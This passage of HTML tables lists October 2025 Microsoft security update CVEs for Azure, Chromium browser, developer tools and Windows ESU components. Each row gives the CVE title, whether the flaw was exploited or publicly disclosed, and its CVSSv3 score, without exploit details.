ltr;"><span style='font-size: undefined;'>8.7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59291"><span style='font-size: undefined;'>CVE-2025-59291</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Confidential Azure Container Instances Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.2</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59292"><span style='font-size: undefined;'>CVE-2025-59292</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Azure Compute Gallery Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.2</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-0033"><span style='font-size: undefined;'>CVE-2025-0033</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>AMD CVE-2025-0033: RMP Corruption During SNP Initialization</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Yes</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.2</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59494"><span style='font-size: undefined;'>CVE-2025-59494</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Azure Monitor Agent Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-58724"><span style='font-size: undefined;'>CVE-2025-58724</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Arc Enabled Servers - Azure Connected Machine Agent Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59285"><span style='font-size: undefined;'>CVE-2025-59285</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Azure Monitor Agent Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47989"><span style='font-size: undefined;'>CVE-2025-47989</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Azure Connected Machine Agent Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr></tbody></table><h3 style="direction: ltr;"><strong>Browser vulnerabilities</strong></h3><table><colgroup data-width='1250'><col style="width:13.001605136436597%"/><col style="width:40.93097913322632%"/><col style="width:13.804173354735152%"/><col style="width:16.693418940609952%"/><col style="width:15.569823434991974%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-11460"><span style='font-size: undefined;'>CVE-2025-11460</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-11460 Use after free in Storage</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-11458"><span style='font-size: undefined;'>CVE-2025-11458</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-11458 Heap buffer overflow in Sync</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-11219"><span style='font-size: undefined;'>CVE-2025-11219</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-11219 Use after free in V8</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-11216"><span style='font-size: undefined;'>CVE-2025-11216</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-11216 Inappropriate implementation in Storage</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-11215"><span style='font-size: undefined;'>CVE-2025-11215</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-11215 Off by one error in V8</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-11213"><span style='font-size: undefined;'>CVE-2025-11213</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-11213 Inappropriate implementation in Omnibox</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-11212"><span style='font-size: undefined;'>CVE-2025-11212</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-11212 Inappropriate implementation in Media</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-11211"><span style='font-size: undefined;'>CVE-2025-11211</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-11211 Out of bounds read in Media</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-11210"><span style='font-size: undefined;'>CVE-2025-11210</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-11210 Side-channel information leakage in Tab</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-11209"><span style='font-size: undefined;'>CVE-2025-11209</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-11209 Inappropriate implementation in Omnibox</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-11208"><span style='font-size: undefined;'>CVE-2025-11208</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-11208 Inappropriate implementation in Media</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-11207"><span style='font-size: undefined;'>CVE-2025-11207</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-11207 Side-channel information leakage in Storage</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-11206"><span style='font-size: undefined;'>CVE-2025-11206</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-11206 Heap buffer overflow in Video</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-11205"><span style='font-size: undefined;'>CVE-2025-11205</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Chromium: CVE-2025-11205 Heap buffer overflow in WebGPU</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr></tbody></table><h3 style="direction: ltr;"><strong>Developer Tools vulnerabilities</strong></h3><table><colgroup data-width='1250'><col style="width:12.980769230769232%"/><col style="width:41.02564102564102%"/><col style="width:13.782051282051283%"/><col style="width:16.666666666666668%"/><col style="width:15.544871794871796%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55315"><span style='font-size: undefined;'>CVE-2025-55315</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>ASP.NET Security Feature Bypass Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>9.9</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55240"><span style='font-size: undefined;'>CVE-2025-55240</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Visual Studio Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.3</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55247"><span style='font-size: undefined;'>CVE-2025-55247</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>.NET Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.3</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55248"><span style='font-size: undefined;'>CVE-2025-55248</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>.NET, .NET Framework, and Visual Studio Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>4.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54132"><span style='font-size: undefined;'>CVE-2025-54132</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>GitHub CVE-2025-54132: Arbitrary Image Fetch in Mermaid Diagram Tool</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>4.4</span></p></td></tr></tbody></table><h3 style="direction: ltr;"><strong>Developer Tools ESU Windows vulnerabilities</strong></h3><table><colgroup data-width='1250'><col style="width:15.2%"/><col style="width:35.04%"/><col style="width:13.76%"/><col style="width:18.4%"/><col style="width:17.599999999999998%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-25004"><span style='font-size: undefined;'>CVE-2025-25004</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>PowerShell Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.3</span></p></td></tr></tbody></table><h3 style="direction: ltr;"><strong>ESU Windows vulnerabilities</strong></h3><table><colgroup data-width='1250.0000000000002'><col style="width:11.717495987158907%"/><col style="width:44.62279293739967%"/><col style="width:13.80417335473515%"/><col style="width:15.569823434991973%"/><col style="width:14.285714285714285%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59287"><span style='font-size: undefined;'>CVE-2025-59287</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Server Update Service (WSUS) Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>9.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59295"><span style='font-size: undefined;'>CVE-2025-59295</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows URL Parsing Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-58718"><span style='font-size: undefined;'>CVE-2025-58718</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Remote Desktop Client Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59230"><span style='font-size: undefined;'>CVE-2025-59230</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Remote Access Connection Manager Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Yes</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59187"><span style='font-size: undefined;'>CVE-2025-59187</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Kernel Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55692"><span style='font-size: undefined;'>CVE-2025-55692</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Error Reporting Service Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55701"><span style='font-size: undefined;'>CVE-2025-55701</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Authentication Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59277"><span style='font-size: undefined;'>CVE-2025-59277</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Authentication Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59275"><span style='font-size: undefined;'>CVE-2025-59275</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Authentication Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59278"><span style='font-size: undefined;'>CVE-2025-59278</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Authentication Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59242"><span style='font-size: undefined;'>CVE-2025-59242</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-58714"><span style='font-size: undefined;'>CVE-2025-58714</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-24052"><span style='font-size: undefined;'>CVE-2025-24052</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Agere Modem Driver Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Yes</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-24990"><span style='font-size: undefined;'>CVE-2025-24990</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Agere Modem Driver Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Yes</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59201"><span style='font-size: undefined;'>CVE-2025-59201</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Network Connection Status Indicator (NCSI) Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-58726"><span style='font-size: undefined;'>CVE-2025-58726</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows SMB Server Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55687"><span style='font-size: undefined;'>CVE-2025-55687</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Resilient File System (ReFS) Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.4</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55335"><span style='font-size: undefined;'>CVE-2025-55335</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows NTFS Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.4</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59208"><span style='font-size: undefined;'>CVE-2025-59208</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows MapUrlToZone Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59196"><span style='font-size: undefined;'>CVE-2025-59196</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Simple Search and Discovery Protocol (SSDP) Service Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59202"><span style='font-size: undefined;'>CVE-2025-59202</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Remote Desktop Services Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59205"><span style='font-size: undefined;'>CVE-2025-59205</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Graphics Component Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-58725"><span style='font-size: undefined;'>CVE-2025-58725</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows COM+ Event System Service Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: 